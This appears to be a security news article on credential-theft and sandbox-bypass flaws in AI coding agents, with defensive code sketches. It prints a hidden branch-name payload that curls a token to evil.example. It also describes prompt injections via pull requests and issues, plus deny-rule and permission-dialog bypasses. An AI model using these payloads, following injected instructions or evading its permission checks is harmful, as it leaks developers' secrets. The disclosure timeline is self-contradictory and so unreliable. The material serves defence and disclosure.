Over nine months, six independent research teams demonstrated the same brutal truth about AI coding assistants: they're credential sponges wrapped in a polished interface. On March 30, BeyondTrust proved that a crafted GitHub branch name could steal Codex's OAuth token in cleartext—OpenAI classified it Critical P1 and shipped a fix by February 5, 2026. Two days later, Adversa found Claude Code silently ignored its own deny rules once a command exceeded 50 subcommands. These weren't isolated bugs. They were the latest entries in a systematic exploitation of an attack surface that every major AI vendor has failed to secure.
The Codex Branch Name Heist
BeyondTrust researchers Tyler Jespersen, Fletcher Davis, and Simon Stewart found that Codex cloned repositories using a GitHub OAuth token embedded directly in the git remote URL. During cloning, the branch name parameter flowed unsanitized into the setup script, so a semicolon and a backtick were enough to turn a branch name into an exfiltration payload. Stewart supplied the stealth layer: by appending 94 Ideographic Space characters (Unicode U+3000) after "main," the malicious branch looked identical to the standard main branch in Codex's web portal. A developer sees "main." The shell sees curl exfiltrating their token. OpenAI remediated the flaw by February 5, 2026.
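The unsafe pattern is easy to reconstruct in miniature. The sketch below is hypothetical — the repository URL, token, and payload are illustrative, not BeyondTrust's actual proof of concept — but it shows why an unquoted branch name interpolated into a shell command becomes an injection vector, and how U+3000 padding pushes the payload out of view in a UI that truncates long names:

```python
import shlex

TOKEN = "gho_example_token"  # illustrative placeholder, not a real credential

def clone_cmd_unsafe(branch: str) -> str:
    # UNSAFE: the branch name is interpolated, unquoted, into a shell
    # command string, so `;`, backticks, and $() all remain live syntax
    return f"git clone -b {branch} https://x:{TOKEN}@github.com/org/repo.git"

def clone_cmd_safe(branch: str) -> str:
    # shlex.quote() turns the whole branch name into one inert argument
    return f"git clone -b {shlex.quote(branch)} https://x:{TOKEN}@github.com/org/repo.git"

# Attacker-controlled branch: "main", then 94 ideographic spaces (U+3000)
# to hide what follows, then a command-substitution payload
evil_branch = "main" + "\u3000" * 94 + ";`curl${IFS}evil.example/?t=$TOKEN`"
```

In the unsafe form the semicolon terminates the git command and the backticks execute curl; in the safe form the entire branch name, padding and payload included, is a single quoted argument the shell never interprets.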
Claude Code's Triple Threat
Anthropic's agent faced three distinct bypasses. CVE-2026-25723 broke file-write restrictions: because command chaining wasn't validated, piped sed and echo commands could escape the project sandbox. It was patched in version 2.0.55. CVE-2026-33068 was subtler: Claude Code resolved permission modes from .claude/settings.json before showing the workspace trust dialog, so a malicious repo could set permissions.defaultMode to bypassPermissions and never trigger the prompt. That one was patched in 2.1.53. The third exploit landed last: Adversa discovered that Claude Code dropped deny-rule enforcement entirely once a command chain exceeded 50 subcommands. Anthropic's engineers had traded security for speed and simply stopped checking after fifty.
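The 50-subcommand bug reduces to a truncated check. This is a minimal sketch, assuming — hypothetically, since Anthropic's internals aren't public — that deny rules were matched per subcommand and enforcement stopped at a fixed limit; function and variable names are illustrative:

```python
SUBCOMMAND_LIMIT = 50  # hypothetical cap mirroring the reported behavior

def is_allowed_buggy(subcommands: list[str], deny_rules: set[str]) -> bool:
    # BUG: only the first SUBCOMMAND_LIMIT entries are ever checked,
    # so anything at position 51 or later escapes the deny list
    return not any(cmd in deny_rules for cmd in subcommands[:SUBCOMMAND_LIMIT])

def is_allowed_fixed(subcommands: list[str], deny_rules: set[str]) -> bool:
    # Fix: enforce deny rules over the entire chain, whatever its length
    return not any(cmd in deny_rules for cmd in subcommands)

# 50 benign subcommands, then a denied one hidden at position 51
chain = ["echo ok"] * 50 + ["curl evil.example"]
deny = {"curl evil.example"}
```

The buggy version approves the chain; the fixed version rejects it. The lesson generalizes: a security check that short-circuits on input size is a check an attacker can pad past.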
Copilot's Pull Request Trap
Johann Rehberger and Markus Vervier of Persistent Security demonstrated CVE-2025-53773 against GitHub Copilot: hidden instructions in pull request descriptions steered the agent into flipping auto-approve mode in .vscode/settings.json, disabling all confirmations and granting unrestricted shell execution across Windows, macOS, and Linux. Microsoft patched it in the August 2025 Patch Tuesday release. Then Orca Security cracked Copilot inside GitHub Codespaces: a GitHub issue containing hidden instructions manipulated the agent into checking out a malicious PR carrying a symbolic link to /workspaces/.codespaces/shared/user-secrets-envs.json. The result was full repository takeover, with zero user interaction beyond opening the issue.
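The Codespaces exfiltration worked because a symbolic link inside the checkout resolved to a secrets file outside it. A containment check along these lines — a sketch with illustrative paths, not Copilot's actual implementation — is the guard that was missing: resolving the path before trusting it means a link pointing outside the workspace fails the test.

```python
from pathlib import Path

def resolves_inside(workspace: Path, candidate: Path) -> bool:
    # Path.resolve() follows symlinks, so a link that points at a file
    # outside the workspace (e.g. a mounted secrets store) is caught here
    try:
        real = candidate.resolve(strict=True)
    except OSError:
        return False  # broken link or unreadable path: reject outright
    return real.is_relative_to(workspace.resolve())
```

Applied to every file an agent is about to read or act on, the check turns the symlink trick from silent exfiltration into a hard refusal.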
Vertex AI's Supply Chain Exposure
Unit 42 researcher Ofir Shaty found that Google Vertex AI's default service identity had excessive permissions by design. The stolen P4SA credentials granted unrestricted read access to every Cloud Storage bucket in the project and reached restricted, Google-owned Artifact Registry repositories at the core of Vertex AI Reasoning Engine. Shaty described the compromised P4SA as functioning like a "double agent" with access to both user data and Google's own infrastructure.
The Credential Gap Nobody's Fixing
"Enterprises believe they've 'approved' AI vendors, but what they've actually approved is an interface, not the underlying system," said Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS. "The credentials underneath the interface are the breach." Mike Riemer, CTO at Ivanti, quantified the operational risk: "Threat actors are reverse engineering patches within 72 hours. If a customer doesn't patch within 72 hours of release, they're open to exploit." For AI agents, that window compresses to seconds.
Key Takeaways
- Every major AI coding assistant—Codex, Claude Code, Copilot, Vertex AI—was exploited via credential theft or privilege escalation in the same nine-month period
- The attack pattern is identical: agents hold credentials, execute actions, authenticate without human session anchoring
- Vendors shipped defenses for each exploit, but every defense was subsequently bypassed by researchers
- CrowdStrike CTO Elia Zaitsev's rule at RSAC 2026: collapse agent identities back to the human—agents should never have more privileges than their users
- Enterprises inventory every human identity but have zero inventory of AI agents running with equivalent credentials
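Zaitsev's rule has a direct set-theoretic reading: an agent's effective permissions must be a subset of its operating human's. A minimal sketch of that invariant, with illustrative permission strings:

```python
def agent_within_user(agent_perms: set[str], user_perms: set[str]) -> bool:
    # Zaitsev's rule: the agent may hold at most what its human holds
    return agent_perms <= user_perms

def excess_privileges(agent_perms: set[str], user_perms: set[str]) -> set[str]:
    # The grants to revoke before this agent should be allowed to run
    return agent_perms - user_perms

user = {"repo:read", "repo:write"}
agent = {"repo:read", "repo:write", "org:admin"}  # over-privileged agent
```

Run against an inventory of agent identities, the second function is exactly the report enterprises currently can't produce: which agents hold credentials their humans don't.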